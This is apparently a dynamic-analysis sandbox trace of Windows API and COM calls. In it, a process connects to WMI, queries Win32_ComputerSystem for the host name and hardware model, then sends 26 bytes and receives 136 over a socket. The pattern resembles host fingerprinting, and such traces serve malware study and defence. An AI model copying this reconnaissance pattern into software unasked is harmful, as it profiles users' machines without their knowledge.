	[0200.519] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__SERVER", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0200.519] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0200.520] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0200.520] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0200.520] IWbemClassObject:Get (in: This=0x1c83c960, wszName="__PATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0200.520] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0200.520] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c838280, puCount=0x1c80d1c0 | out: puCount=0x1c80d1c0*=0x2) returned 0x0
	[0200.520] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d1c0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1c0*=0x17, pszText=0x0) returned 0x0
	[0200.520] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d1c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.520] IWbemClassObject:Get (in: This=0x1c83c960, wszName="Model", lFlags=0, pVal=0x1c80d1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d1ac*=0, plFlavor=0x1c80d1a8*=0 | out: pVal=0x1c80d1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x1c80d1ac*=8, plFlavor=0x1c80d1a8*=32) returned 0x0
	[0200.520] SysStringLen (param_1="M5X0JE") returned 0x6
	[0200.521] IWbemClassObject:Get (in: This=0x1c83c960, wszName="Model", lFlags=0, pVal=0x1c80d3e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d3dc*=8, plFlavor=0x1c80d3d8*=32 | out: pVal=0x1c80d3e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x1c80d3dc*=8, plFlavor=0x1c80d3d8*=32) returned 0x0
	[0200.521] SysStringLen (param_1="M5X0JE") returned 0x6
	[0200.523] send (s=0x404, buf=0x30e93b0*, len=26, flags=0) returned 26
	[0200.523] recv (in: s=0x404, buf=0x3076510, len=502, flags=0 | out: buf=0x3076510*) returned 136
	[0200.537] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0200.542] CoGetObjectContext (in: riid=0x1c80cff8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cff0 | out: ppv=0x1c80cff0*=0x181868) returned 0x0
	[0200.542] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80d010 | out: pAptType=0x1c80d010*=1) returned 0x0
	[0200.542] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d118 | out: ppvObject=0x1c80d118*=0x0) returned 0x80004002
	[0200.543] IUnknown:Release (This=0x181868) returned 0x1
	[0200.544] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c680 | out: ppv=0x1c80c680*=0x1c831b40) returned 0x0
	[0200.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c831b40, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c390 | out: ppvObject=0x1c80c390*=0x0) returned 0x80004002
	[0200.544] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c831b40, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c378 | out: ppvObject=0x1c80c378*=0x1c835ba0) returned 0x0
	[0200.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ba0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c280 | out: ppvObject=0x1c80c280*=0x1c835ba0) returned 0x0
	[0200.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ba0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c300 | out: ppvObject=0x1c80c300*=0x0) returned 0x80004002
	[0200.545] WbemDefPath:IUnknown:AddRef (This=0x1c835ba0) returned 0x3
	[0200.545] CoGetContextToken (in: pToken=0x1c80bf50 | out: pToken=0x1c80bf50) returned 0x0
	[0200.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ba0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bf10 | out: ppvObject=0x1c80bf10*=0x1b81f950) returned 0x0
	[0200.545] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b81f950, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bf40 | out: pCid=0x1c80bf40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.546] WbemDefPath:IUnknown:Release (This=0x1b81f950) returned 0x3
	[0200.546] CoGetContextToken (in: pToken=0x1c80bf20 | out: pToken=0x1c80bf20) returned 0x0
	[0200.546] WbemDefPath:IUnknown:AddRef (This=0x1c835ba0) returned 0x4
	[0200.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ba0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c038 | out: ppvObject=0x1c80c038*=0x0) returned 0x80004002
	[0200.546] WbemDefPath:IUnknown:Release (This=0x1c835ba0) returned 0x3
	[0200.546] WbemDefPath:IUnknown:Release (This=0x1c835ba0) returned 0x2
	[0200.547] WbemDefPath:IUnknown:Release (This=0x1c831b40) returned 0x0
	[0200.547] WbemDefPath:IUnknown:Release (This=0x1c835ba0) returned 0x1
	[0200.547] CoGetContextToken (in: pToken=0x1c80cc50 | out: pToken=0x1c80cc50) returned 0x0
	[0200.547] CoGetContextToken (in: pToken=0x1c80cb90 | out: pToken=0x1c80cb90) returned 0x0
	[0200.547] WbemDefPath:IUnknown:AddRef (This=0x1c835ba0) returned 0x2
	[0200.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ba0, riid=0x1c80ccd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ccb0 | out: ppvObject=0x1c80ccb0*=0x1c835ba0) returned 0x0
	[0200.547] WbemDefPath:IUnknown:Release (This=0x1c835ba0) returned 0x2
	[0200.548] WbemDefPath:IUnknown:Release (This=0x1c835ba0) returned 0x1
	[0200.548] CoGetContextToken (in: pToken=0x1c80cdd0 | out: pToken=0x1c80cdd0) returned 0x0
	[0200.548] CoGetContextToken (in: pToken=0x1c80cd10 | out: pToken=0x1c80cd10) returned 0x0
	[0200.548] WbemDefPath:IUnknown:AddRef (This=0x1c835ba0) returned 0x2
	[0200.548] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c835ba0, riid=0x1c80ce50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ce30 | out: ppvObject=0x1c80ce30*=0x1c835ba0) returned 0x0
	[0200.548] WbemDefPath:IUnknown:Release (This=0x1c835ba0) returned 0x2
	[0200.548] WbemDefPath:IUnknown:AddRef (This=0x1c835ba0) returned 0x3
	[0200.549] WbemDefPath:IWbemPath:SetText (This=0x1c835ba0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.549] WbemDefPath:IUnknown:Release (This=0x1c835ba0) returned 0x2
	[0200.549] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c835ba0, puCount=0x1c80d0e0 | out: puCount=0x1c80d0e0*=0x2) returned 0x0
	[0200.549] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d0e0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d0e0*=0x17, pszText=0x0) returned 0x0
	[0200.549] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d0e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d0e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.549] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c835ba0, puCount=0x1c80d090 | out: puCount=0x1c80d090*=0x2) returned 0x0
	[0200.549] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d090*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d090*=0x17, pszText=0x0) returned 0x0
	[0200.549] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d090*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d090*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.550] CoGetObjectContext (in: riid=0x1c80cfc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfc0 | out: ppv=0x1c80cfc0*=0x181868) returned 0x0
	[0200.550] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfe0 | out: pAptType=0x1c80cfe0*=1) returned 0x0
	[0200.550] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0e8 | out: ppvObject=0x1c80d0e8*=0x0) returned 0x80004002
	[0200.550] IUnknown:Release (This=0x181868) returned 0x1
	[0200.550] CoGetClassObject (in: rclsid=0x1b8026f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cc70 | out: ppv=0x1c80cc70*=0x1c831be0) returned 0x0
	[0200.550] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831be0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c980 | out: ppvObject=0x1c80c980*=0x0) returned 0x80004002
	[0200.551] WbemLocator:IClassFactory:CreateInstance (in: This=0x1c831be0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c968 | out: ppvObject=0x1c80c968*=0x1c831c00) returned 0x0
	[0200.551] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831c00, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c870 | out: ppvObject=0x1c80c870*=0x1c831c00) returned 0x0
	[0200.551] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831c00, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8f0 | out: ppvObject=0x1c80c8f0*=0x0) returned 0x80004002
	[0200.552] WbemLocator:IUnknown:AddRef (This=0x1c831c00) returned 0x3
	[0200.552] CoGetContextToken (in: pToken=0x1c80c540 | out: pToken=0x1c80c540) returned 0x0
	[0200.552] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831c00, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c500 | out: ppvObject=0x1c80c500*=0x0) returned 0x80004002
	[0200.553] CoGetContextToken (in: pToken=0x1c80c510 | out: pToken=0x1c80c510) returned 0x0
	[0200.553] WbemLocator:IUnknown:AddRef (This=0x1c831c00) returned 0x4
	[0200.553] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831c00, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c628 | out: ppvObject=0x1c80c628*=0x0) returned 0x80004002
	[0200.553] WbemLocator:IUnknown:Release (This=0x1c831c00) returned 0x3
	[0200.553] WbemLocator:IUnknown:Release (This=0x1c831c00) returned 0x2
	[0200.553] WbemLocator:IUnknown:Release (This=0x1c831be0) returned 0x0
	[0200.553] WbemLocator:IUnknown:Release (This=0x1c831c00) returned 0x1
	[0200.554] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0200.554] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0200.554] WbemLocator:IUnknown:AddRef (This=0x1c831c00) returned 0x2
	[0200.554] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831c00, riid=0x1c80cbb0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80cb90 | out: ppvObject=0x1c80cb90*=0x1c831c00) returned 0x0
	[0200.744] WbemLocator:IUnknown:Release (This=0x1c831c00) returned 0x2
	[0200.744] WbemLocator:IUnknown:Release (This=0x1c831c00) returned 0x1
	[0200.744] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c835ba0, puCount=0x1c80cf90 | out: puCount=0x1c80cf90*=0x2) returned 0x0
	[0200.744] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=8, puBuffLength=0x1c80cf90*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cf90*=0x17, pszText=0x0) returned 0x0
	[0200.744] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=8, puBuffLength=0x1c80cf90*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cf90*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.744] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c80cc80 | out: ppv=0x1c80cc80*=0x1c831c20) returned 0x0
	[0200.744] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c831c20, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c80cf10 | out: ppNamespace=0x1c80cf10*=0x1c83aad8) returned 0x0
	[0201.450] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83aad8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80caf8 | out: ppvObject=0x1c80caf8*=0x1b807df0) returned 0x0
	[0201.450] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b807df0, pProxy=0x1c83aad8, pAuthnSvc=0x1c80caf0, pAuthzSvc=0x1c80caec, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8, pImpLevel=0x1c80cb04, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00 | out: pAuthnSvc=0x1c80caf0*=0xa, pAuthzSvc=0x1c80caec*=0x0, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8*=0x6, pImpLevel=0x1c80cb04*=0x2, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00*=0x1) returned 0x0
	[0201.450] WbemLocator:IUnknown:Release (This=0x1b807df0) returned 0x1
	[0201.451] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83aad8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca98 | out: ppvObject=0x1c80ca98*=0x1b807e30) returned 0x0
	[0201.451] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83aad8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca28 | out: ppvObject=0x1c80ca28*=0x1b807df0) returned 0x0
	[0201.451] WbemLocator:IClientSecurity:SetBlanket (This=0x1b807df0, pProxy=0x1c83aad8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0201.451] WbemLocator:IUnknown:Release (This=0x1b807df0) returned 0x2
	[0201.451] WbemLocator:IUnknown:Release (This=0x1b807e30) returned 0x1
	[0201.451] CoTaskMemFree (pv=0x1b81e770) 
	[0201.451] WbemLocator:IUnknown:Release (This=0x1c831c20) returned 0x0
	[0201.452] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83aad8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c710 | out: ppvObject=0x1c80c710*=0x1b807e30) returned 0x0
	[0201.452] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807e30, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c790 | out: ppvObject=0x1c80c790*=0x0) returned 0x80004002
	[0201.453] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807e30, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c528 | out: ppvObject=0x1c80c528*=0x0) returned 0x80004002
	[0201.453] WbemLocator:IUnknown:AddRef (This=0x1b807e30) returned 0x3
	[0201.454] CoGetContextToken (in: pToken=0x1c80c3e0 | out: pToken=0x1c80c3e0) returned 0x0
	[0201.454] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807e30, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c3a0 | out: ppvObject=0x1c80c3a0*=0x1b807d18) returned 0x0
	[0201.454] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807d18, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c3d0 | out: pCid=0x1c80c3d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0201.454] WbemLocator:IUnknown:Release (This=0x1b807d18) returned 0x3
	[0201.455] CoGetContextToken (in: pToken=0x1c80c3b0 | out: pToken=0x1c80c3b0) returned 0x0
	[0201.455] WbemLocator:IUnknown:AddRef (This=0x1b807e30) returned 0x4
	[0201.455] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807e30, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c8 | out: ppvObject=0x1c80c4c8*=0x1b807e00) returned 0x0
	[0201.455] WbemLocator:IUnknown:Release (This=0x1b807e30) returned 0x4
	[0201.455] WbemLocator:IRpcOptions:Query (in: This=0x1b807e00, pPrx=0x1b807e30, dwProperty=2, pdwValue=0x1c80c538 | out: pdwValue=0x1c80c538) returned 0x80004002
	[0201.455] WbemLocator:IUnknown:Release (This=0x1b807e00) returned 0x3
	[0201.455] WbemLocator:IUnknown:Release (This=0x1b807e30) returned 0x2
	[0201.456] CoGetContextToken (in: pToken=0x1c80c8b0 | out: pToken=0x1c80c8b0) returned 0x0
	[0201.456] CoGetContextToken (in: pToken=0x1c80c7f0 | out: pToken=0x1c80c7f0) returned 0x0
	[0201.456] WbemLocator:IUnknown:AddRef (This=0x1b807e30) returned 0x3
	[0201.456] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807e30, riid=0x1c80c930*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80c910 | out: ppvObject=0x1c80c910*=0x1c83aad8) returned 0x0
	[0201.456] WbemLocator:IUnknown:Release (This=0x1b807e30) returned 0x3
	[0201.456] WbemLocator:IUnknown:Release (This=0x1c83aad8) returned 0x2
	[0201.456] WbemLocator:IUnknown:Release (This=0x1c83aad8) returned 0x1
	[0201.457] CoGetContextToken (in: pToken=0x1c80ceb0 | out: pToken=0x1c80ceb0) returned 0x0
	[0201.457] WbemLocator:IUnknown:AddRef (This=0x1b807e30) returned 0x2
	[0201.457] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807e30, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca80 | out: ppvObject=0x1c80ca80*=0x1b807e30) returned 0x0
	[0201.457] WbemLocator:IUnknown:Release (This=0x1b807e30) returned 0x2
	[0201.457] WbemLocator:IUnknown:Release (This=0x1b807e30) returned 0x1
	[0201.458] CoGetContextToken (in: pToken=0x1c80cb50 | out: pToken=0x1c80cb50) returned 0x0
	[0201.458] CoGetContextToken (in: pToken=0x1c80ca90 | out: pToken=0x1c80ca90) returned 0x0
	[0201.458] WbemLocator:IUnknown:AddRef (This=0x1b807e30) returned 0x2
	[0201.458] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807e30, riid=0x1c80cbd0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80cbb0 | out: ppvObject=0x1c80cbb0*=0x1c83aad8) returned 0x0
	[0201.458] WbemLocator:IUnknown:Release (This=0x1b807e30) returned 0x2
	[0201.458] WbemLocator:IUnknown:AddRef (This=0x1c83aad8) returned 0x3
	[0201.459] IWbemServices:ExecQuery (in: This=0x1c83aad8, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c80d048 | out: ppEnum=0x1c80d048*=0x1c836188) returned 0x0
	[0201.465] IUnknown:QueryInterface (in: This=0x1c836188, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc58 | out: ppvObject=0x1c80cc58*=0x1c836190) returned 0x0
